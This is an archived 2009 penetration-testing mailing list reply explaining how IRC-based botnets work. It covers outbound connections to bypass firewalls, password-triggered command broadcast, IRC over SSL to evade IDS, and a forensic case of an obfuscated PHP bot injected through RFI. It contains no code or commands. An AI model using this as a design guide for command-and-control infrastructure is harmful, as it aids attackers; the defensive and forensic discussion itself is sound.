Penetration Testing mailing list archives
Re: Botnets
From: Aarón Mizrachi <unmanarc () gmail com>
Date: Thu, 26 Mar 2009 22:45:35 -0430
On Miércoles 25 Marzo 2009 01:22:14 M.D.Mufambisi escribió:
Hi Guys. Can someone please explain to me how botnets use IRC? I want to make a presentation to my group demonstrating this in my lab which comprises of 4 winxp boxes. Unpatched. How are commands issued via IRC?
Hi, i recopiled some info of botnets on my forensics... botnets are a new name to a old technique: TROJANS More specific: wide spredeable trojans that can act as zombies or use your computer on non-legitim pourporses... A popular method (SINCE SUB7 INCLUSIVE), is make a reverse connection to an a public IRC server who believe that you are a legitim user of chatrooms. Why botnets? 1th motivation: Useful way to bypass firewalls, when a bot/trojan make a connection to an IRC server, it connects like a normal user do it, in the past, firewalling only protected you against incomming connections, but, outcomming connections is allowed by default. 2nd motivation: Hide attacker ip address. An attacker could connect to IRC server, and make directly connections to the client. Therefore an attacker does not show any ip address. (IRC server could log the attacker ip address, but... also an attacker could use a proxy) 3rd motivation: Agregation. An attacker could connect to a only one IRC server to control thousands of computers. There is no need to connect to every hacked computer to do an specific action (ex. attack and shutdown a website by flooding or send spam accross a distributed network). How (How it works on IRC)? A bot, computer infected, or what do you like to name it, emit a outgoing connection to a public or private IRC server (Its well known that users always click yes, permit outgoing connection also...). Generally its a public IRC server. this client authenticate, and open a common channel (or a set of...), then, a irc bot can chat with random or AI engine to prevent drop's, also responce to PING PONG irc protocol, and listen for a keyword. This keyword/password generally acts as "ignitor", and allow the attacker to send command. An attacker join to the bot channel, and send the password, and then, send commands in plaintext (like a bash), all these commands are delivered over IRC protocol to every bot in the channel. Therefore, every bot check, interpret and execute the command. IRCS? IRC over SSL are a specific technique used by specific sofisticated trojans to circumvent IDS/IPS that cann't look into SSL. -------------------------------------------------------------------------------------- More on edge... We usually think that a botnet act like a .exe running on my machine, comming from an USB infected unit, or by phishing. But botnets are spreading over systems that i never thinked before... _Botnets over php_ This is a relative new method used by some people to extend a botnet scope over webservers that commonly have more bandwidth that a simple home computer. How it works? In a recent forensic that i did, i discovered a php botnet injected by an RFI attack. This was a excellent cover: The attacker used a page celebrating a baby born. If you take a look over this page, there was only a baby born page... but if you look inside deeply, you will get an obfuscated and self-crypted php code. That php code have a fsockopen php command to a set of IRC Servers (With failovers and random functions...). i remark, that php code was injected with RFI method. make a connection over IRC server and let the attacker to deface many sites centralized from an IRC. ------------------------ Then what i concluded in my forensic investigation? This method allowed an attacker to control a server without infect him directly, and also without leave hard traces on the hard-drive... It was a luck that the page still there when i did the forensic. And it was a luck that i didn't believed that this page was real.
Kind regards, Munyaradzi ------------------------------------------------------------------------ This list is sponsored by: InfoSec Institute Tired of using other people's tools? Why not learn how to write your own exploits? InfoSec Institute's Advanced Ethical Hacking class teaches you how to write stack and heap buffer overflow exploits for Windows and Linux. Gain your Certified Expert Penetration Tester (CEPT) cert as well. http://www.infosecinstitute.com/courses/advanced_ethical_hacking_training.h tml ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: InfoSec Institute No time or budget for traveling to a training course in this fiscal year? Check out the online penetration testing courses available at InfoSec Institute. More than a boring "talking head", train in our virtual labs for a total hands-on training experience. Get the certs you need as well: CEH, CPT, CEPT, ECSA, LPT. http://www.infosecinstitute.com/request_online_training.html ------------------------------------------------------------------------
Current thread:
- Botnets M.D.Mufambisi (Mar 26)
- Re: Botnets Aarón Mizrachi (Mar 30)
- Re: Botnets sr. (Mar 30)
- Re: Botnets Laurens Vets (Mar 30)
- Re: Botnets the.soylent (Mar 30)
- Re: Botnets Wasim Halani (Mar 30)
- RE: Botnets Dishman, James L (Mar 30)
- Re: Botnets M.D.Mufambisi (Mar 30)